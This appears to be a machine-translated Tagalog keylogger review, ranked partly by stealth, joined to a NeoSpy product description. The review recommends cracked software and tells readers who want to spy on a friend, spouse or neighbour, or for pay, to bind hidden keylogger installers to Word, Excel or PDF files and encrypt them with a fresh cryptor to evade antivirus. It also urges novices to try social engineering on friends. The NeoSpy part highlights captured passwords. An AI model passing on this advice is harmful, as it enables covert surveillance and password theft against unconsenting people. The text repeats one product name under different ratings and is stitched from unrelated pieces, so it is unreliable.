• Kaginhawaan/kakayahang magamit: 8
• Pag-andar: 10

Isa ring mahusay na keylogger, kahit na may kahina-hinalang lihim. Ang mga sinusuportahang bersyon ng OS ay posible rin. Ang pag-andar ay katulad ng mga nakaraang opsyon. Mayroong isang kawili-wiling pag-andar ng self-destruct pagkatapos ng isang tinukoy na tagal ng panahon (o sa pag-abot sa isang paunang natukoy na petsa).

Bilang karagdagan, posible na mag-record ng video mula sa isang webcam at tunog mula sa isang mikropono, na maaari ding maging napakapopular at kung saan ang nakaraang dalawang kinatawan ay wala.

Mayroong isang network mode ng operasyon, na kung saan ay maginhawa para sa pagsubaybay sa isang buong network ng mga computer. Sa pamamagitan ng paraan, ang StaffCop ay mayroon nito (hindi ito kasama sa pagsusuri dahil sa pagiging walang silbi nito para sa isang user - isang indibidwal). Marahil ang programang ito ay mainam para sa mga employer na tiktikan ang kanilang mga empleyado (bagaman ang mga pinuno sa larangang ito ay walang pasubali na StaffCop at LanAgent - kung ikaw ay isang legal na entity, siguraduhing tumingin sa kanilang direksyon). O para subaybayan ang iyong mga supling na mahilig umupo at manood ng mga “adult sites”. Yung. kung saan ang kailangan ay hindi pagtatago, ngunit kaginhawahan (kabilang ang isang bungkos ng magagandang ulat ng log, atbp.) at pag-andar para sa pagharang sa mga tinukoy na site/programa (mayroon din ang SpyAgent).

4. Spyrix Personal na monitor.

Mga rating (sa 10):

• Palihim: 4
• Kaginhawaan/kakayahang magamit: 6
• Pag-andar: 10

Ang pag-andar ay nasa antas ng nakaraang kandidato, ngunit ang parehong mga problema sa lihim. Bilang karagdagan, ang pag-andar ay may kasamang isang kawili-wiling bagay: pagkopya ng mga file mula sa mga USB drive na ipinasok sa computer, pati na rin ang malayuang pagtingin sa mga log sa pamamagitan ng isang web account sa website ng Spyrix (ngunit magda-download kami ng isang basag na bersyon, kaya hindi magtrabaho para sa amin).

5. Spyrix Personal na monitor.

Mga rating (sa 10):

• Palihim: 3
• Kaginhawaan/kakayahang magamit: 6
• Pag-andar: 8

Hindi ko ito ilalarawan nang detalyado, dahil... ang pagkakataong ito ay walang anumang bagay na wala sa isa sa mga naunang espiya, gayunpaman, maaaring may magustuhan ang keylogger na ito (kahit para sa interface nito).

Ano ang ating matatapos?

Ang isyu ng paggamit ng keylogger ay mas etikal kaysa teknikal, at ito ay lubos na nakadepende sa iyong mga layunin.

Kung ikaw ay isang tagapag-empleyo na gustong kontrolin ang kanyang mga empleyado, huwag mag-atubiling mag-set up ng StaffCop, mangolekta ng nakasulat na pahintulot mula sa lahat ng empleyado para sa mga naturang aksyon (kung hindi, maaari kang seryosong singilin para sa mga ganoong bagay) at ang trabaho ay nasa bag. Bagama't personal kong alam ang mga mas epektibong paraan upang mapataas ang pagganap ng aking mga empleyado.

Kung ikaw ay isang baguhan na espesyalista sa IT na gusto lang maranasan kung ano ang pakiramdam ng masira ang isang tao - at kung paano gumagana ang bagay na ito sa pangkalahatan, pagkatapos ay armasan ang iyong sarili ng mga pamamaraan ng social engineering at magsagawa ng mga pagsubok sa iyong mga kaibigan, gamit ang alinman sa mga halimbawang ibinigay. Gayunpaman, tandaan: ang pagtuklas ng naturang aktibidad ng mga biktima ay hindi nakakatulong sa pagkakaibigan at mahabang buhay. ;) At talagang hindi mo dapat subukan ito sa iyong trabaho. Markahan ang aking mga salita: Mayroon akong karanasan dito. ;)

Kung ang iyong layunin ay tiktikan ang iyong kaibigan, asawa, kapitbahay, o marahil ay ginagawa mo ito nang regular at para sa pera, pag-isipang mabuti kung sulit ito. Pagkatapos ng lahat, maaga o huli ay maaari silang maakit. At ito ay hindi katumbas ng halaga: "ang paghalungkat sa maruming labada ng ibang tao ay hindi isang kaaya-ayang kasiyahan." Kung kailangan mo pa (o marahil ay nagtatrabaho ka sa larangan ng pagsisiyasat sa mga krimen sa computer at ang mga naturang gawain ay bahagi ng iyong mga propesyonal na responsibilidad), kung gayon mayroon lamang dalawang pagpipilian: Ang Daga! at Elite Keylogger. Sa mode ng mga nakatagong distribusyon ng pag-install, nakadikit sa salita / excel / pdf. At ito ay mas mahusay, kung maaari, naka-encrypt gamit ang isang sariwang cryptor. Sa kasong ito lamang natin magagarantiya ang mas ligtas na mga aktibidad at tunay na tagumpay.

Ngunit sa anumang kaso, ito ay nagkakahalaga ng pag-alala na ang karampatang paggamit ng mga keylogger ay isang maliit na link lamang sa pagkamit ng layunin (kabilang ang kahit isang simpleng pag-atake). Hindi ka palaging may mga karapatan sa admin, hindi ka palaging may pisikal na access, at hindi lahat ng user ay magbubukas, magbabasa, at higit pa kaya magda-download ng iyong mga attachment/link (hello social engineering), hindi palaging madi-disable ang antivirus. /iyong keylogger/cryptor ay hindi palaging hindi kilala sa kanila . Ang lahat ng ito at maraming hindi masasabing mga problema ay maaaring malutas, ngunit ang kanilang solusyon ay ang paksa ng isang buong serye ng magkakahiwalay na mga artikulo.

Sa madaling salita, nagsimula ka pa lamang na sumisid sa kumplikado, mapanganib, ngunit hindi kapani-paniwalang kawili-wiling mundo ng seguridad ng impormasyon. :)

Taos-puso,Lysyak A.S.

Keylogger ay isang program na nagbabasa ng mga key na pinindot at ini-save ang mga ito sa isang file. Sa hinaharap, maaari mong tingnan kung ano ang isinulat ng tao sa computer, kung anong mga mensahe ang kanyang na-type at kung anong mga password ang kanyang ipinasok. Ang isa pang pangalan para sa isang keylogger ay isang keylogger, mula sa English na "keylogger," na literal na nangangahulugang "mga pindutan ng pag-record."

Sa NeoSpy program, ang keylogger function ay pinagana bilang default; sa mode na ito, ang program ay nagtatala ng teksto, mga kumbinasyon ng hotkey at mga password na na-type sa keyboard. Ang pamamahala ng mga setting ng keylogger ay matatagpuan sa menu na "Mga Setting ng Pagsubaybay" - "Pagre-record ng Log" - "Keyboard". Maaari kang pumili ng isa sa dalawang operating mode ng program: standard at alternatibo. Inirerekomenda na gamitin ang karaniwang opsyon 99% ng oras, ngunit kung may salungat sa iyong antivirus software, maaari mong paganahin ang alternatibong mode.

Pagse-set up ng keylogger

Palaging naka-record ang keyboard log sa buong format, kasama ang mga service key. Ang isang halimbawa ng naturang log ay makikita sa ilustrasyon. Kapag tinitingnan ang ulat, maaari mong huwag paganahin ang pagpapakita ng hindi napi-print na mga character at tingnan ang log bilang simpleng teksto, na mas madaling ma-access para sa libreng pagbabasa.

Halimbawa ng Keylogger

Upang gawing mas madali ang pagtatrabaho sa mga ulat, ang mga nai-type na password ay naka-highlight sa listahan ng mga keystroke. Sa ganitong paraan maaari mong malaman ang mga password ng iyong anak at, kung kinakailangan, protektahan siya mula sa mga hindi gustong mga kakilala. Kung ang NeoSpy program ay ginagamit sa isang enterprise upang subaybayan ang mga empleyado, kung gayon ang pagkolekta ng personal na data at pagsusulatan ay ipinagbabawal ng batas ng karamihan sa mga bansa, kaya ang pagpipiliang ito ay dapat na hindi pinagana, o ang empleyado ay dapat na maabisuhan nang nakasulat tungkol sa kontrol ng pamamahala at ang hindi pagtanggap ng paggamit ng computer sa organisasyon para sa personal na sulat.